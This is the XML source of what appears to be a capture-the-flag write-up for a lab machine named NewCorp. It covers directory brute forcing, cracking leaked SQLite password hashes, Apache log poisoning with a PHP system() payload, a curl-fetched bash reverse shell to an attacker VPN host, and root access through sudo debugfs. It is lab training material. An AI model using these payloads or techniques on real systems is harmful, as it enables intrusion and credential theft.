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qpo9fdnwhnm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ltxfm82m53sd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write-up refers to the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NewCorp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machine. If support is required, please open a ticket in the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support channel on the Discord server. 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dzwztbomw9nc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Reconnaissance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performed port enumeration with the objective of identifying active and exposed services in the target environment.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--min-rate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-sVC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-vvv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38400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Two exposed ports were identified in the environment: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port 80 (HTTP)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port 22 (SSH)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accessing the web application through port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we began analyzing the interface and the exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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22813"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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8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During directory and subdomain brute forcing of the web application, a directory named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identified.</w:t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ffuf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http://&lt;machine-ip&gt;/FUZZ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big.txt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651488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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4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accessing this directory via the browser, the file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db.sqlite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identified. Since this is clearly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SQLite database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it was downloaded for local analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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84400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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20900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Next,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sqlite3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used to open and analyze the database. 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Inside the database, the available tables were identified. By analyzing their contents,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table was located, from which stored credentials were obtained.</w:t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1|admin|df0d078fe1083da6814a556ef576e2091830a8a3|1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2|peter|516fa3fd6bf97a4b3ff09ec93877d39005a7996d|0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3|solomon|e052b3b52a733baee5577da9aca18b4ef0f22c88|0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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId15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CrackStation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website, it was possible to crack the discovered password hashes, allowing recovery of user credentials and access to the account of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peter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peter:slipknot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476500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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From this point on, access to the web application was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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14600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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analyzing the web application, a file read functionality was identified that allows access to certain system files, including the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Apache access.log file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Since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files store requests made to the web service, it is possible to write data into these files. Based on this,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log poisoning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attack was identified as viable, injecting malicious code into the logs so that it is later interpreted by the application.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execute system commands,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PHP system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function was used, exploiting the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log poisoning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vulnerability to force the application to interpret the injected payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;?php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system('id');?&gt;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66900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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page was reloaded so the malicious code would be executed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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obtain a reverse shell,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curl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used to force the web application to execute a file that initiated a reverse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bash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connection. As a result, the target machine established an interactive session with our server, allowing remote system access.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For this,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index.html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 was used as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payload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trigger the reverse shell via a request made using curl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;?php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system('curl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&lt;machine-vpn&gt;/index.html|sh');?&gt;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/bin/bash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/dev/tcp/&lt;machine-vpn&gt;/443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0&gt;&amp;1"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file was executed by the application, enabling the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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38300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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page was reloaded again, and the request sent by the application was received.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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allowed access as the user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www-data.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28800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Exploitation – Obtaining the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the reverse connection was established, the shell was upgraded to an interactive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TTY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ctr+z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-echo;fg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11300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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gaining system access, the existing users on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machine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were identified, and it was confirmed that the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peter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was also present locally. This made it possible to test credential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reuse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using the password previously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extracted from the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/etc/passwd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slipknot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790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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 this way, access to the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peter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obtained, and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user flag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located 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/home/peter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retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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odg6c89y6cu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80" w:lineRule="auto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o7xgzbe0yi6h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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root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sudo -l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command, we identified which commands the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peter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is allowed to execute as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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output showed that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peter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has permission to execute the binary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/usr/sbin/debugfs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with root privileges.</w:t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Since the user can run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debugfs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as root, it was possible to abuse this configuration following the technique documented on </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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GTFOBins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allowing execution of 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shell (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sh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with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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594338"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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3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By exploiting this technique and invoking a shell through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debugfs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access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user was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089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/usr/bin/debufs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!/bin/sh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36700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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root flag is located in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/root.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28800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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left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headerReference r:id="rId32" w:type="default"/>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f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C">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                           Page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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.id1vkhdxe9j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-866770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65" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image11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7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8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12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-942970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74" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="5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NewCorp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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="56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86550" cy="301567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6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/debugfs/" TargetMode="External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2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/291#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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L9POhesw8vdmhY9pYOnGGQOpLA==">CgMxLjAyDWgucXBvOWZkbndobm0yDmgubHR4Zm04Mm01M3NkMg5oLmR6d3p0Ym9tdzluYzIOaC5vZGc2Yzg5eTZjdTEyDmgubzd4Z3piZTB5aTZoMg1oLmlkMXZraGR4ZTlqOAByITFHTGJGMFg1c3l0YTF6QnhXYmFMOW0zajh4cHZ3NjJDcg==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